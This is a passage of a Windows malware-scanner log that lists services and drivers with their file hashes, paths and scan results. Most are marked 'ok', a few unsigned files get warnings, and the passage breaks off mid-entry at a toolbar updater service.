BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys 01:19:36.0279 5804 MountMgr - ok 01:19:36.0357 5804 [ 5C5E45DDABEFBC9F564F1D5C83258B8F ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe 01:19:36.0373 5804 MozillaMaintenance - ok 01:19:36.0435 5804 [ 511D011289755DD9F9A7579FB0B064E6 ] mpio C:\Windows\system32\drivers\mpio.sys 01:19:36.0451 5804 mpio - ok 01:19:36.0482 5804 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys 01:19:36.0529 5804 mpsdrv - ok 01:19:36.0560 5804 [ D1639BA315B0D79DEC49A4B0E1FB929B ] MpsSvc C:\Windows\system32\mpssvc.dll 01:19:36.0669 5804 MpsSvc - ok 01:19:36.0716 5804 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys 01:19:36.0747 5804 Mraid35x - ok 01:19:36.0763 5804 [ AE3DE84536B6799D2267443CEC8EDBB9 ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys 01:19:36.0825 5804 MRxDAV - ok 01:19:36.0888 5804 [ 5734A0F2BE7E495F7D3ED6EFD4B9F5A1 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys 01:19:36.0997 5804 mrxsmb - ok 01:19:37.0012 5804 [ 6B5FA5ADFACAC9DBBE0991F4566D7D55 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys 01:19:37.0059 5804 mrxsmb10 - ok 01:19:37.0059 5804 [ 5C80D8159181C7ABF1B14BA703B01E0B ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys 01:19:37.0090 5804 mrxsmb20 - ok 01:19:37.0153 5804 [ 28023E86F17001F7CD9B15A5BC9AE07D ] msahci C:\Windows\system32\drivers\msahci.sys 01:19:37.0184 5804 msahci - ok 01:19:37.0215 5804 [ 4468B0F385A86ECDDAF8D3CA662EC0E7 ] msdsm C:\Windows\system32\drivers\msdsm.sys 01:19:37.0246 5804 msdsm - ok 01:19:37.0262 5804 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe 01:19:37.0356 5804 MSDTC - ok 01:19:37.0418 5804 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys 01:19:37.0449 5804 Msfs - ok 01:19:37.0480 5804 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys 
01:19:37.0496 5804 msisadrv - ok 01:19:37.0558 5804 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll 01:19:37.0636 5804 MSiSCSI - ok 01:19:37.0636 5804 msiserver - ok 01:19:37.0683 5804 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys 01:19:37.0730 5804 MSKSSRV - ok 01:19:37.0761 5804 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys 01:19:37.0792 5804 MSPCLOCK - ok 01:19:37.0808 5804 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys 01:19:37.0855 5804 MSPQM - ok 01:19:37.0886 5804 [ B5614AECB05A9340AA0FB55BF561CC63 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys 01:19:37.0917 5804 MsRPC - ok 01:19:37.0933 5804 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys 01:19:37.0964 5804 mssmbios - ok 01:19:37.0980 5804 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys 01:19:38.0011 5804 MSTEE - ok 01:19:38.0089 5804 [ 97AFFA9D95FFE20EEE6229BC6BE166CF ] MTsensor C:\Windows\system32\DRIVERS\ATKACPI.sys 01:19:38.0120 5804 MTsensor - ok 01:19:38.0136 5804 [ 6DFD1D322DE55B0B7DB7D21B90BEC49C ] Mup C:\Windows\system32\Drivers\mup.sys 01:19:38.0151 5804 Mup - ok 01:19:38.0198 5804 [ C43B25863FBD65B6D2A142AF3AE320CA ] napagent C:\Windows\system32\qagentRT.dll 01:19:38.0338 5804 napagent - ok 01:19:38.0401 5804 [ 3C21CE48FF529BB73DADB98770B54025 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys 01:19:38.0448 5804 NativeWifiP - ok 01:19:38.0494 5804 [ 9BDC71790FA08F0A0B5F10462B1BD0B1 ] NDIS C:\Windows\system32\drivers\ndis.sys 01:19:38.0526 5804 NDIS - ok 01:19:38.0604 5804 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys 01:19:38.0650 5804 NdisTapi - ok 01:19:38.0650 5804 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys 01:19:38.0713 5804 Ndisuio - ok 01:19:38.0744 5804 [ 3D14C3B3496F88890D431E8AA022A411 ] 
NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys 01:19:38.0806 5804 NdisWan - ok 01:19:38.0853 5804 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys 01:19:38.0978 5804 NDProxy - ok 01:19:39.0009 5804 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys 01:19:39.0087 5804 NetBIOS - ok 01:19:39.0118 5804 [ 7C5FEE5B1C5728507CD96FB4A13E7A02 ] netbt C:\Windows\system32\DRIVERS\netbt.sys 01:19:39.0181 5804 netbt - ok 01:19:39.0212 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] Netlogon C:\Windows\system32\lsass.exe 01:19:39.0274 5804 Netlogon - ok 01:19:39.0321 5804 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll 01:19:39.0446 5804 Netman - ok 01:19:39.0462 5804 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll 01:19:39.0555 5804 netprofm - ok 01:19:39.0618 5804 [ 0AD5876EF4E9EB77C8F93EB5B2FFF386 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe 01:19:39.0649 5804 NetTcpPortSharing - ok 01:19:39.0711 5804 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys 01:19:39.0727 5804 nfrd960 - ok 01:19:39.0758 5804 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll 01:19:39.0836 5804 NlaSvc - ok 01:19:39.0852 5804 [ ECB5003F484F9ED6C608D6D6C7886CBB ] Npfs C:\Windows\system32\drivers\Npfs.sys 01:19:39.0898 5804 Npfs - ok 01:19:39.0914 5804 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll 01:19:39.0992 5804 nsi - ok 01:19:40.0008 5804 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys 01:19:40.0039 5804 nsiproxy - ok 01:19:40.0117 5804 [ B4EFFE29EB4F15538FD8A9681108492D ] Ntfs C:\Windows\system32\drivers\Ntfs.sys 01:19:40.0164 5804 Ntfs - ok 01:19:40.0242 5804 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys 01:19:40.0304 5804 ntrigdigi - ok 01:19:40.0304 
5804 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys 01:19:40.0351 5804 Null - ok 01:19:40.0382 5804 [ 2EDF9E7751554B42CBB60116DE727101 ] nvraid C:\Windows\system32\drivers\nvraid.sys 01:19:40.0398 5804 nvraid - ok 01:19:40.0444 5804 [ ABED0C09758D1D97DB0042DBB2688177 ] nvstor C:\Windows\system32\drivers\nvstor.sys 01:19:40.0460 5804 nvstor - ok 01:19:40.0507 5804 [ 18BBDF913916B71BD54575BDB6EEAC0B ] nv_agp C:\Windows\system32\drivers\nv_agp.sys 01:19:40.0522 5804 nv_agp - ok 01:19:40.0522 5804 NwlnkFlt - ok 01:19:40.0538 5804 NwlnkFwd - ok 01:19:40.0585 5804 [ 790E27C3DB53410B40FF9EF2FD10A1D9 ] ohci1394 C:\Windows\system32\DRIVERS\ohci1394.sys 01:19:40.0616 5804 ohci1394 - ok 01:19:40.0694 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] p2pimsvc C:\Windows\system32\p2psvc.dll 01:19:40.0834 5804 p2pimsvc - ok 01:19:40.0897 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] p2psvc C:\Windows\system32\p2psvc.dll 01:19:40.0975 5804 p2psvc - ok 01:19:41.0068 5804 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys 01:19:41.0146 5804 Parport - ok 01:19:41.0178 5804 [ 3B38467E7C3DAED009DFE359E17F139F ] partmgr C:\Windows\system32\drivers\partmgr.sys 01:19:41.0193 5804 partmgr - ok 01:19:41.0224 5804 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys 01:19:41.0287 5804 Parvdm - ok 01:19:41.0302 5804 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll 01:19:41.0380 5804 PcaSvc - ok 01:19:41.0396 5804 [ 01B94418DEB235DFF777CC80076354B4 ] pci C:\Windows\system32\drivers\pci.sys 01:19:41.0412 5804 pci - ok 01:19:41.0443 5804 [ FC175F5DDAB666D7F4D17449A547626F ] pciide C:\Windows\system32\drivers\pciide.sys 01:19:41.0474 5804 pciide - ok 01:19:41.0490 5804 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys 01:19:41.0505 5804 pcmcia - ok 01:19:41.0552 5804 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys 
01:19:41.0724 5804 PEAUTH - ok 01:19:41.0817 5804 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll 01:19:42.0036 5804 pla - ok 01:19:42.0067 5804 [ 78F975CB6D18265BE6F492EDB2D7BC7B ] PlugPlay C:\Windows\system32\umpnpmgr.dll 01:19:42.0238 5804 PlugPlay - ok 01:19:42.0285 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll 01:19:42.0410 5804 PNRPAutoReg - ok 01:19:42.0457 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] PNRPsvc C:\Windows\system32\p2psvc.dll 01:19:42.0550 5804 PNRPsvc - ok 01:19:42.0613 5804 [ 47B8F37AA18B74D8C2E1BC1A7A2C8F8A ] PolicyAgent C:\Windows\System32\ipsecsvc.dll 01:19:42.0706 5804 PolicyAgent - ok 01:19:42.0753 5804 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys 01:19:42.0800 5804 PptpMiniport - ok 01:19:42.0862 5804 [ 2027293619DD0F047C584CF2E7DF4FFD ] Processor C:\Windows\system32\drivers\processr.sys 01:19:42.0909 5804 Processor - ok 01:19:42.0972 5804 [ B627E4FC8585E8843C5905D4D3587A90 ] ProfSvc C:\Windows\system32\profsvc.dll 01:19:43.0096 5804 ProfSvc - ok 01:19:43.0143 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] ProtectedStorage C:\Windows\system32\lsass.exe 01:19:43.0206 5804 ProtectedStorage - ok 01:19:43.0268 5804 [ BFEF604508A0ED1EAE2A73E872555FFB ] PSched C:\Windows\system32\DRIVERS\pacer.sys 01:19:43.0299 5804 PSched - ok 01:19:43.0377 5804 [ 0A6DB55AFB7820C99AA1F3A1D270F4F6 ] ql2300 C:\Windows\system32\drivers\ql2300.sys 01:19:43.0455 5804 ql2300 - ok 01:19:43.0518 5804 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys 01:19:43.0533 5804 ql40xx - ok 01:19:43.0580 5804 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll 01:19:43.0720 5804 QWAVE - ok 01:19:43.0752 5804 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys 01:19:43.0783 5804 QWAVEdrv - ok 01:19:43.0798 5804 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys 
01:19:43.0861 5804 RasAcd - ok 01:19:43.0876 5804 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll 01:19:43.0986 5804 RasAuto - ok 01:19:44.0017 5804 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys 01:19:44.0064 5804 Rasl2tp - ok 01:19:44.0079 5804 [ 6E7C284FC5C4EC07AD164D93810385A6 ] RasMan C:\Windows\System32\rasmans.dll 01:19:44.0220 5804 RasMan - ok 01:19:44.0251 5804 [ 3E9D9B048107B40D87B97DF2E48E0744 ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys 01:19:44.0282 5804 RasPppoe - ok 01:19:44.0313 5804 [ A7D141684E9500AC928A772ED8E6B671 ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys 01:19:44.0360 5804 RasSstp - ok 01:19:44.0376 5804 [ 6E1C5D0457622F9EE35F683110E93D14 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys 01:19:44.0422 5804 rdbss - ok 01:19:44.0438 5804 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys 01:19:44.0485 5804 RDPCDD - ok 01:19:44.0500 5804 [ FBC0BACD9C3D7F6956853F64A66E252D ] rdpdr C:\Windows\system32\drivers\rdpdr.sys 01:19:44.0532 5804 rdpdr - ok 01:19:44.0547 5804 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys 01:19:44.0578 5804 RDPENCDD - ok 01:19:44.0610 5804 [ E1C18F4097A5ABCEC941DC4B2F99DB7E ] RDPWD C:\Windows\system32\drivers\RDPWD.sys 01:19:44.0641 5804 RDPWD - ok 01:19:44.0672 5804 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll 01:19:44.0734 5804 RemoteAccess - ok 01:19:44.0766 5804 [ CC4E32400F3C7253400CF8F3F3A0B676 ] RemoteRegistry C:\Windows\system32\regsvc.dll 01:19:44.0859 5804 RemoteRegistry - ok 01:19:44.0937 5804 [ 23F486726DA7A9B2F3EC7326421A9C36 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys 01:19:44.0968 5804 RFCOMM - ok 01:19:44.0984 5804 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe 01:19:45.0093 5804 RpcLocator - ok 01:19:45.0140 5804 [ 301AE00E12408650BADDC04DBC832830 ] RpcSs C:\Windows\system32\rpcss.dll 
01:19:45.0249 5804 RpcSs - ok 01:19:45.0312 5804 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys 01:19:45.0358 5804 rspndr - ok 01:19:45.0358 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] SamSs C:\Windows\system32\lsass.exe 01:19:45.0421 5804 SamSs - ok 01:19:45.0452 5804 [ 24E9427B1BBD7F0A3DBD8657D552A6C6 ] Samsung UPD Service C:\Windows\System32\SUPDSvc.exe 01:19:45.0546 5804 Samsung UPD Service ( UnsignedFile.Multi.Generic ) - warning 01:19:45.0546 5804 Samsung UPD Service - detected UnsignedFile.Multi.Generic (1) 01:19:45.0561 5804 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys 01:19:45.0592 5804 sbp2port - ok 01:19:45.0624 5804 [ 11387E32642269C7E62E8B52C060B3C6 ] SCardSvr C:\Windows\System32\SCardSvr.dll 01:19:45.0702 5804 SCardSvr - ok 01:19:45.0780 5804 [ 7B587B8A6D4A99F79D2902D0385F29BD ] Schedule C:\Windows\system32\schedsvc.dll 01:19:45.0873 5804 Schedule - ok 01:19:45.0920 5804 [ 87C2D0377B23E2D8A41093C2F5FB1A5B ] SCPolicySvc C:\Windows\System32\certprop.dll 01:19:45.0967 5804 SCPolicySvc - ok 01:19:46.0029 5804 [ 126EA89BCC413EE45E3004FB0764888F ] sdbus C:\Windows\system32\DRIVERS\sdbus.sys 01:19:46.0060 5804 sdbus - ok 01:19:46.0107 5804 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll 01:19:46.0216 5804 SDRSVC - ok 01:19:46.0248 5804 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys 01:19:46.0310 5804 secdrv - ok 01:19:46.0326 5804 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll 01:19:46.0419 5804 seclogon - ok 01:19:46.0450 5804 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll 01:19:46.0528 5804 SENS - ok 01:19:46.0544 5804 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys 01:19:46.0606 5804 Serenum - ok 01:19:46.0638 5804 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys 01:19:46.0700 5804 Serial - ok 
01:19:46.0731 5804 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys 01:19:46.0762 5804 sermouse - ok 01:19:46.0794 5804 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll 01:19:46.0887 5804 SessionEnv - ok 01:19:46.0918 5804 [ 3EFA810BDCA87F6ECC24F9832243FE86 ] sffdisk C:\Windows\system32\drivers\sffdisk.sys 01:19:46.0950 5804 sffdisk - ok 01:19:46.0965 5804 [ E95D451F7EA3E583AEC75F3B3EE42DC5 ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys 01:19:47.0012 5804 sffp_mmc - ok 01:19:47.0028 5804 [ 3D0EA348784B7AC9EA9BD9F317980979 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys 01:19:47.0059 5804 sffp_sd - ok 01:19:47.0074 5804 [ C33BFBD6E9E41FCD9FFEF9729E9FAED6 ] sfloppy C:\Windows\system32\DRIVERS\sfloppy.sys 01:19:47.0121 5804 sfloppy - ok 01:19:47.0152 5804 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll 01:19:47.0262 5804 SharedAccess - ok 01:19:47.0308 5804 [ 1E3FDB80E40A3CE645F229DFBDFB7694 ] ShellHWDetection C:\Windows\System32\shsvcs.dll 01:19:47.0433 5804 ShellHWDetection - ok 01:19:47.0480 5804 [ 1D76624A09A054F682D746B924E2DBC3 ] sisagp C:\Windows\system32\drivers\sisagp.sys 01:19:47.0496 5804 sisagp - ok 01:19:47.0527 5804 [ F7DA61BD62A16510227656C3477E2B52 ] SiSGbeLH C:\Windows\system32\DRIVERS\SiSGB6.sys 01:19:47.0558 5804 SiSGbeLH - ok 01:19:47.0589 5804 [ 43CB7AA756C7DB280D01DA9B676CFDE2 ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys 01:19:47.0620 5804 SiSRaid2 - ok 01:19:47.0652 5804 [ A99C6C8B0BAA970D8AA59DDC50B57F94 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys 01:19:47.0667 5804 SiSRaid4 - ok 01:19:47.0745 5804 [ 8B603F150942992F2E6792E507B4C67F ] SkypeUpdate C:\Program Files\Skype\Updater\Updater.exe 01:19:47.0823 5804 SkypeUpdate - ok 01:19:47.0917 5804 [ 0BA91E1358AD25236863039BB2609A2E ] slsvc C:\Windows\system32\SLsvc.exe 01:19:48.0151 5804 slsvc - ok 01:19:48.0260 5804 [ 7C6DC44CA0BFA6291629AB764200D1D4 ] SLUINotify 
C:\Windows\system32\SLUINotify.dll 01:19:48.0385 5804 SLUINotify - ok 01:19:48.0400 5804 [ 031E6BCD53C9B2B9ACE111EAFEC347B6 ] Smb C:\Windows\system32\DRIVERS\smb.sys 01:19:48.0447 5804 Smb - ok 01:19:48.0541 5804 [ C8A58FC905C9184FA70E37F71060C64D ] smserial C:\Windows\system32\DRIVERS\smserial.sys 01:19:48.0634 5804 smserial - ok 01:19:48.0697 5804 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe 01:19:48.0790 5804 SNMPTRAP - ok 01:19:48.0915 5804 [ 060F51141B20B8156804446A04AB8B2A ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys 01:19:49.0071 5804 SNP2UVC - ok 01:19:49.0118 5804 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys 01:19:49.0196 5804 spldr - ok 01:19:49.0305 5804 [ 3665F79026A3F91FBCA63F2C65A09B19 ] Spooler C:\Windows\System32\spoolsv.exe 01:19:49.0461 5804 Spooler - ok 01:19:49.0524 5804 [ 2252AEF839B1093D16761189F45AF885 ] srv C:\Windows\system32\DRIVERS\srv.sys 01:19:49.0570 5804 srv - ok 01:19:49.0586 5804 [ B7FF59408034119476B00A81BB53D5D1 ] srv2 C:\Windows\system32\DRIVERS\srv2.sys 01:19:49.0648 5804 srv2 - ok 01:19:49.0695 5804 [ 2ACCC9B12AF02030F531E6CCA6F8B76E ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys 01:19:49.0726 5804 srvnet - ok 01:19:49.0773 5804 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll 01:19:49.0882 5804 SSDPSRV - ok 01:19:49.0945 5804 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys 01:19:49.0976 5804 ssmdrv - ok 01:19:50.0007 5804 [ EF3458337D7341A05169CEFC73709264 ] SSPORT C:\Windows\system32\Drivers\SSPORT.sys 01:19:50.0023 5804 SSPORT ( UnsignedFile.Multi.Generic ) - warning 01:19:50.0023 5804 SSPORT - detected UnsignedFile.Multi.Generic (1) 01:19:50.0054 5804 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll 01:19:50.0148 5804 SstpSvc - ok 01:19:50.0194 5804 [ 7DD08A597BC56051F320DA0BAF69E389 ] stisvc C:\Windows\System32\wiaservc.dll 01:19:50.0366 5804 stisvc - ok 
01:19:50.0460 5804 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys 01:19:50.0475 5804 swenum - ok 01:19:50.0506 5804 [ B36C7CDB86F7F7A8E884479219766950 ] swprv C:\Windows\System32\swprv.dll 01:19:50.0631 5804 swprv - ok 01:19:50.0662 5804 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys 01:19:50.0678 5804 Symc8xx - ok 01:19:50.0709 5804 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys 01:19:50.0725 5804 Sym_hi - ok 01:19:50.0772 5804 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys 01:19:50.0787 5804 Sym_u3 - ok 01:19:50.0834 5804 [ 55F6E55CC2430CA8713387106FA79817 ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys 01:19:50.0850 5804 SynTP - ok 01:19:50.0896 5804 [ 8710A92D0024B03B5FB9540DF1F71F1D ] SysMain C:\Windows\system32\sysmain.dll 01:19:51.0006 5804 SysMain - ok 01:19:51.0068 5804 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll 01:19:51.0177 5804 TabletInputService - ok 01:19:51.0224 5804 [ 680916BB09EE0F3A6ACA7C274B0D633F ] TapiSrv C:\Windows\System32\tapisrv.dll 01:19:51.0333 5804 TapiSrv - ok 01:19:51.0364 5804 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll 01:19:51.0474 5804 TBS - ok 01:19:51.0520 5804 [ 782568AB6A43160A159B6215B70BCCE9 ] Tcpip C:\Windows\system32\drivers\tcpip.sys 01:19:51.0583 5804 Tcpip - ok 01:19:51.0661 5804 [ 782568AB6A43160A159B6215B70BCCE9 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys 01:19:51.0708 5804 Tcpip6 - ok 01:19:51.0817 5804 [ D4A2E4A4B011F3A883AF77315A5AE76B ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys 01:19:51.0864 5804 tcpipreg - ok 01:19:51.0879 5804 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys 01:19:51.0926 5804 TDPIPE - ok 01:19:51.0957 5804 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys 01:19:52.0004 5804 TDTCP - ok 01:19:52.0051 5804 [ 
D09276B1FAB033CE1D40DCBDF303D10F ] tdx C:\Windows\system32\DRIVERS\tdx.sys 01:19:52.0098 5804 tdx - ok 01:19:52.0410 5804 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe 01:19:52.0987 5804 TeamViewer8 - ok 01:19:53.0018 5804 [ A048056F5E1A96A9BF3071B91741A5AA ] TermDD C:\Windows\system32\DRIVERS\termdd.sys 01:19:53.0065 5804 TermDD - ok 01:19:53.0112 5804 [ D605031E225AACCBCEB5B76A4F1603A6 ] TermService C:\Windows\System32\termsrv.dll 01:19:53.0361 5804 TermService - ok 01:19:53.0408 5804 [ 1E3FDB80E40A3CE645F229DFBDFB7694 ] Themes C:\Windows\system32\shsvcs.dll 01:19:53.0517 5804 Themes - ok 01:19:53.0533 5804 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll 01:19:53.0626 5804 THREADORDER - ok 01:19:53.0642 5804 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll 01:19:53.0751 5804 TrkWks - ok 01:19:53.0798 5804 [ 16613A1BAD034D4ECF957AF18B7C2FF5 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe 01:19:53.0845 5804 TrustedInstaller - ok 01:19:53.0876 5804 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys 01:19:53.0907 5804 tssecsrv - ok 01:19:53.0938 5804 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys 01:19:53.0970 5804 tunmp - ok 01:19:54.0016 5804 [ 6042505FF6FA9AC1EF7684D0E03B6940 ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys 01:19:54.0048 5804 tunnel - ok 01:19:54.0063 5804 [ 7D33C4DB2CE363C8518D2DFCF533941F ] uagp35 C:\Windows\system32\drivers\uagp35.sys 01:19:54.0094 5804 uagp35 - ok 01:19:54.0110 5804 [ 8B5088058FA1D1CD897A2113CCFF6C58 ] udfs C:\Windows\system32\DRIVERS\udfs.sys 01:19:54.0141 5804 udfs - ok 01:19:54.0172 5804 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe 01:19:54.0266 5804 UI0Detect - ok 01:19:54.0297 5804 [ B0ACFDC9E4AF279E9116C03E014B2B27 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys 01:19:54.0313 5804 
uliagpkx - ok 01:19:54.0360 5804 [ 9224BB254F591DE4CA8D572A5F0D635C ] uliahci C:\Windows\system32\drivers\uliahci.sys 01:19:54.0375 5804 uliahci - ok 01:19:54.0422 5804 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys 01:19:54.0438 5804 UlSata - ok 01:19:54.0484 5804 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys 01:19:54.0500 5804 ulsata2 - ok 01:19:54.0516 5804 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys 01:19:54.0562 5804 umbus - ok 01:19:54.0609 5804 [ F53CF959B09B94AAE5AF30E150B9A2AF ] Updater Service for EazelBar C:\Program Files\EazelBar\ToolbarUpdaterService.exe 01:19:54.0640 5804 Updater Service for EazelBar ( 